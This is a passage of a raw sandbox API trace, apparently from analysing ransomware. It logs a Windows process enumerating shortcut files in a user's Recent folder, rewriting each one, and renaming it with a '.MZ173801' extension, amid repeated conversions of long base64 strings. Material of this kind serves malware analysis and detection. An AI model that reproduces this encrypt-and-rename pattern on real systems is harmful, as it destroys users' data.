lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.031] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.031] GetCurrentThreadId () returned 0x1358 [0112.031] GetCurrentThreadId () returned 0x1358 [0112.031] GetCurrentThreadId () returned 0x1358 [0112.031] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uO40eItURrDuO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\uo40eiturrduo.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.031] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.031] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.031] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x4a6 [0112.032] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.032] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x4a6, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x4a6, lpOverlapped=0x0) returned 1 [0112.032] CloseHandle (hObject=0x3f4) returned 1 [0112.032] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uO40eItURrDuO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\uo40eiturrduo.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.033] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x4a6, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x4a6, lpOverlapped=0x0) returned 1 [0112.034] CloseHandle (hObject=0x3f4) returned 1 [0112.035] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uO40eItURrDuO.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\uo40eiturrduo.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uO40eItURrDuO.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\uo40eiturrduo.lnk.mz173801")) returned 1 [0112.036] GetCurrentThreadId () returned 0x1358 [0112.036] GetCurrentThreadId () returned 0x1358 [0112.036] GetCurrentThreadId () returned 0x1358 [0112.036] GetCurrentThreadId () returned 0x1358 [0112.036] GetCurrentThreadId () returned 0x1358 [0112.036] GetCurrentThreadId () returned 0x1358 [0112.036] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3466b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x8419b0d7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8419b0d7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x433, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uP0XF1kok-teK_dZt2-3.lnk", cAlternateFileName="UP0XF1~1.LNK")) returned 1 [0112.036] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.036] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.036] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uP0XF1kok-teK_dZt2-3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\up0xf1kok-tek_dzt2-3.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec3466b1, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x8419b0d7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x8419b0d7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x433)) returned 1 [0112.036] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.036] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0112.037] GetCurrentThreadId () returned 0x1358 [0112.037] GetCurrentThreadId () returned 0x1358 [0112.037] GetCurrentThreadId () returned 0x1358 [0112.037] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.037] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0112.037] GetCurrentThreadId () returned 0x1358 [0112.037] GetCurrentThreadId () returned 0x1358 [0112.037] GetCurrentThreadId () returned 0x1358 [0112.037] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uP0XF1kok-teK_dZt2-3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\up0xf1kok-tek_dzt2-3.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.038] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0112.038] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.038] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x433 [0112.038] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0112.038] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x433, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x433, lpOverlapped=0x0) returned 1 [0112.039] CloseHandle (hObject=0x3f4) returned 1 [0112.039] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uP0XF1kok-teK_dZt2-3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\up0xf1kok-tek_dzt2-3.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0112.040] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x433, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x433, lpOverlapped=0x0) returned 1 [0112.040] CloseHandle (hObject=0x3f4) returned 1 [0112.041] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uP0XF1kok-teK_dZt2-3.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\up0xf1kok-tek_dzt2-3.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\uP0XF1kok-teK_dZt2-3.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\up0xf1kok-tek_dzt2-3.lnk.mz173801")) returned 1 [0112.042] GetCurrentThreadId () returned 0x1358 [0112.042] GetCurrentThreadId () returned 0x1358 [0112.042] GetCurrentThreadId () returned 0x1358 [0112.042] GetCurrentThreadId () returned 0x1358 [0112.042] GetCurrentThreadId () returned 0x1358 [0112.042] GetCurrentThreadId () returned 0x1358 [0112.042] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762a000e, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x762a000e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x762a138b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x495, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="v4vV8.lnk", cAlternateFileName="")) returned 1 [0112.042] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0112.042] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0112.042] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\v4vV8.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\v4vv8.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762a000e, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x762a000e, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x762a138b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x495)) returned 1 [0112.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0112.043] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 